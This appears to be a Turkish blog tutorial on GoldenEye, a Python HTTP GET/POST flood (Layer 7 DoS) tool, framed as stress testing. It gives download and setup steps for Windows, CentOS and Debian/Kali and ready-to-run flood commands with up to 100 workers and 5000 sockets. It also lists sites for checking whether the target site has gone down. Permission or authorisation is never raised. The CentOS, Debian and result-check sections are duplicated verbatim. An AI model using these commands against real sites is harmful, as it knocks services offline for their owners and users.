GoldenEye Layer 7 DoS güvenlik testi yazılımıdır. HTTP Get ve Post istekleri ile DoS Stress Testing için kullanılır. HTTP Flood saldırısı olarak da bilinir. HTTP Get/Post için en çok kullanılan GoldenEye Layer 7 yazılımını bu makalede inceleyeceğiz.
Program: GoldenEye
Açıklama: HTTP D/DDoS Stress Testing HTTP Keep Alive + NoCache
Protokol: Layer 7 Application Layer
Code: Python
Developer: Jan Seidl (jseidl[at]wroot.org)
GoldenEye Kaynaklar
github.com/jseidl/GoldenEye (Önerilen)
github.com/jseidl/GoldenEye-Mobile (GoldenEye Mobil Versiyon)
www.useragentstring.com (User Agent String)
Ön Bilgiler
-w, --workers: Eş zamanlı yapılan Process(çalışan sayısı) (Örnek: -w 100)
-s, --sockets: Eş zamanlı test edilecek Sockets sayısı. (Örnek: -s 100)
-m, --method: HTTP saldırı yöntemleri (get,post,random) (Örnek: -m get)
-d, --debug : Hata ayıklama modu etkinleştirmek içindir.
Testi bitirmek için CTRL+C demeniz yeterlidir. Workers yani eş zamanlı arka planda yapılacak işlemdir. En fazla 100 değerini almaktadır.
Python Kurulumu (Windows/Kali Linux/CentOS/Linux/Android)
1) Windows üzerinde GoldenEye kullanımı
GoldenEye klasörünü C:\Python27 dizini içerisine atın. Başlat Çalıştır'dan (cmd) yazarak komut satırını açalım.
GoldenEye klasörüne gelelim;
# cd C:\Python27\GoldenEye
Kullanım yönergesi için;
# goldeneye.py -h
Test komutu;
# goldeneye.py http://www.testdomain.com/
Örnek test çeşitleri;
# goldeneye.py http://www.testdomain.com/ -w 10 -s 10 -m random
# goldeneye.py http://www.testdomain.com/ -w 20 -s 200 -m random
2) CentOS(Sunucu) üzerinde GoldenEye kullanımı
Sunucu Güncelleme;
# yum -y update
# yum -y install epel-release
CentOS / RHEL 7 Python ve Development Tools;
# yum -y group install "Development Tools"
GoldenEye Script dosyasını sunucuya çekelim;
# wget https://github.com/jseidl/GoldenEye/archive/master.zip
# unzip master.zip
# mv GoldenEye-master GoldenEye
GoldenEye klasörüne gelin;
# cd GoldenEye
Gerekli ayarlar ve kullanım;
# chmod +x goldeneye.py
# python ./goldeneye.py
Örnek test çeşitleri;
# ./goldeneye.py http://www.testdomain.com/
# ./goldeneye.py http://www.testdomain.com/ -w 10 -s 10 -m random
# ./goldeneye.py http://www.testdomain.com/ -w 100 -s 1000 -m get -d
# ./goldeneye.py http://www.testdomain.com/ -w 100 -s 5000 -m random -d
# ./goldeneye.py http://www.testdomain.com/ -w 100 -s 5000 -m post -d
3) Debian, Ubuntu(Sunucu) ve Kali Linux üzerinde GoldenEye kullanımı
Debian üzerinde Python kurulumu ve kullanımı daha basit olduğu için stres testlerini Debian sunucu üzerinde yapmanızı öneririm.
İlk olarak Debian güncelleme ve Python kurulumlarını kısaca yapalım;
# apt-get update
# apt-get install python
Python kontrolü ve versiyonu öğrenmek için;
# python --version
Sonra GoldenEye klasörünü ana dizine attıktan sonra dizin içine girelim ve yetki verelim;
# cd GoldenEye
# chmod +x goldeneye.py
HTTP Get Flood D/DoS güvenlik testi ile direk başlayalım;
# ./goldeneye.py http://www.testdomain.com/ -w 100 -s 1000 -m get -d
# ./goldeneye.py http://www.testdomain.com/ -w 100 -s 5000 -m random -d
# ./goldeneye.py http://www.testdomain.com/ -w 100 -s 5000 -m post -d
Anlık Test Sonuçları
Anlık test sonuçları için aşağıdaki siteleri ve yöntemleri kullanabilirsiniz;
1) Down Up Time ile siteyi kontol edebilirsiniz: www.downuptime.net
2) Check Host ile siteyi kontrol edebilirsiniz: www.check-host.net
3) Google Chrome'da Ctrl+Shift+N yaparak gizli moda geçerek siteyi açmayı deneyebilirsiniz.
# goldeneye.py http://www.testdomain.com/ -w 10 -s 10 -m random
# goldeneye.py http://www.testdomain.com/ -w 20 -s 200 -m random
2) CentOS(Sunucu) üzerinde GoldenEye kullanımı
Sunucu Güncelleme;
# yum -y update
# yum -y install epel-release
CentOS / RHEL 7 Python ve Development Tools;
# yum -y group install "Development Tools"
GoldenEye Script dosyasını sunucuya çekelim;
# wget https://github.com/jseidl/GoldenEye/archive/master.zip
# unzip master.zip
# mv GoldenEye-master GoldenEye
GoldenEye klasörüne gelin;
# cd GoldenEye
Gerekli ayarlar ve kullanım;
# chmod +x goldeneye.py
# python ./goldeneye.py
Örnek test çeşitleri;
# ./goldeneye.py http://www.testdomain.com/
# ./goldeneye.py http://www.testdomain.com/ -w 10 -s 10 -m random
# ./goldeneye.py http://www.testdomain.com/ -w 100 -s 1000 -m get -d
# ./goldeneye.py http://www.testdomain.com/ -w 100 -s 5000 -m random -d
# ./goldeneye.py http://www.testdomain.com/ -w 100 -s 5000 -m post -d
3) Debian, Ubuntu(Sunucu) ve Kali Linux üzerinde GoldenEye kullanımı
Debian üzerinde Python kurulumu ve kullanımı daha basit olduğu için stres testlerini Debian sunucu üzerinde yapmanızı öneririm.
İlk olarak Debian güncelleme ve Python kurulumlarını kısaca yapalım;
# apt-get update
# apt-get install python
Python kontrolü ve versiyonu öğrenmek için;
# python --version
Sonra GoldenEye klasörünü ana dizine attıktan sonra dizin içine girelim ve yetki verelim;
# cd GoldenEye
# chmod +x goldeneye.py
HTTP Get Flood D/DoS güvenlik testi ile direk başlayalım;
# ./goldeneye.py http://www.testdomain.com/ -w 100 -s 1000 -m get -d
# ./goldeneye.py http://www.testdomain.com/ -w 100 -s 5000 -m random -d
# ./goldeneye.py http://www.testdomain.com/ -w 100 -s 5000 -m post -d
Anlık Test Sonuçları
Anlık test sonuçları için aşağıdaki siteleri ve yöntemleri kullanabilirsiniz;
1) Down Up Time ile siteyi kontol edebilirsiniz: www.downuptime.net
2) Check Host ile siteyi kontrol edebilirsiniz: www.check-host.net
3) Google Chrome'da Ctrl+Shift+N yaparak gizli moda geçerek siteyi açmayı deneyebilirsiniz.
Burak AVCI
Hiç yorum yok:
Yorum Gönder
Makaleye Yorum ve Sorularınızı Bırakabilirsiniz.